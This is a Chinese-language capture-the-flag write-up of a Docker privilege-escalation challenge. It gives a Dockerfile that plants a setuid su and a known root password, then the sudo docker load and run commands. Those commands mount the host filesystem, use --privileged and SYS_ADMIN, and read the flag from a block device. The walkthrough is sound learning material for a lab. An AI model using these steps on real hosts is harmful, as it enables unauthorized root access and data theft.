直接告诉我们flag在/flag中,访问第一小题:
sudo -l查看允许提权执行的命令:
发现有image load命令
题目指明了有rz命令,可以用ZMODEM接收文件,看到一些write up说可以用XShell、MobaXterm、Tabby Terminal等软件连接上传,使用MobaXterm复制粘贴token后按Enter键出现^M
经过查询了解需要做出如下修改:
rz命令显示如下:
搜索得到的解决方案:
兜兜转转还是得XShell,改用XShell进行操作,先随便上传一个1.txt:
但是传输速率是0,这就很奇怪了
what can i say?
换成Tabby Terminal继续操作,同样地,得修改一下telnet的配置:
(注意:右键自动粘贴token不会被显示,输入结束后按Ctrl J即可开始题目)
rz一个1.txt发现被rejected了:
后面了解到~目录的权限是"只读":
切换到/tmp目录下就行了
在一篇文章中提到了,可以让docker里的用户运行一个镜像用su提权到root,待会就制作一个类似的镜像:
https://www.mendelowski.com/til/2024/07/no-new-privileges-docker
先制作镜像:
(注意:镜像名字需要小写字母,不然会报错,忘记截图了)
FROM busybox:latest
# Create a new user
RUN adduser -D -u 1000 user && \
# Set root password
echo "root:root" | chpasswd && \
# Make sure su has correct permissions
chmod u+s /bin/su
# Switch to the new user
USER user
WORKDIR /home/user
CMD ["/bin/sh"]docker build -t dockerfile:latest .命令构建docker镜像:
docker images查看镜像:
docker save -o dockerfile.tar dockerfile:latest命令将镜像导出为tar文件:
gzip dockerfile.tar命令将dockerfile.tar压缩成dockerfile.tar.gz文件并且将dockerfile.tar.gz下载到本地Windows再上传到/tmp中:
(注意:这里不知道为什么直接从VMare中复制粘贴到Windows中会失败,用MobaXterm没反应,用XShell倒是正常)
上传dockerfile.tar.gz:
(这里我以为上传dockerfile.tar卡住了,就想着会不会是文件类型的原因,压缩成.tar.gz后再上传dockerfile.tar.gz,但其实只是单纯的延迟问题)
gunzip dockerfile.tar.gz命令解压:
sudo docker image load < dockerfile.tar命令载入镜像:
因为在开头的sudo -l命令指明了docker run需要用低权限的uid 1000运行容器,-v /:/host是将主机的根目录直接挂载到了容器里:
运行docker镜像:
sudo docker run --rm -u 1000:1000 -v /:/host -it dockerfile命令:
(运行之后会进入到/bin/sh终端中)
开头的sudo -l命令:
进入到/host目录,发现/flag指向的是/dev/vdb设备块,而/dev/vdb的属组是 disk,/dev/vdb的读取权限是对用户组开放的,因此不需要指定容器用户为root,只需要指定用户组disk就有读取权限了:
exit退出,重新运行docker镜像并指定用户组disk:
sudo docker run --rm -u 1000:1000 --user 1000:disk -v /:/host -it dockerfile命令:
发现这次不是Permission denied了,而是Operation not permitted
后面了解到docker默认不允许容器对设备块进行操作
但可以添加参数--privileged=true授予操作设备块的能力:
sudo docker run --rm -u 1000:1000 --user 1000:disk -v /:/host --privileged=true -it dockerfile命令和cat /host/dev/vdb命令:
成功得到flag:
flag{dONT_1OAD_uNTRusT3D_1ma6e_f2c2c2f7d1_plz!}
更推荐使用下面的命令:
或者docker image load < dockerfile.tar后也可以使用如下命令:
dockerv:/tmp$ sudo docker run --rm -u 1000:1000 -v /flag:/flag -v /dev:/dev --pr
ivileged --pid=host --cap-add=SYS_ADMIN reader_busybox1 whoami
user
dockerv:/tmp$ sudo docker run --rm -u 1000:1000 -it -v /flag:/flag -v /dev:/dev
--privileged --pid=host --cap-add=SYS_ADMIN reader_busybox1
~ $ su root
Password:
/home/user # cat /flag
flag{dONT_1OAD_uNTRusT3D_1ma6e_253cb5a83d_plz!}附上删除docker镜像命令:
docker rmi dockerfile命令:
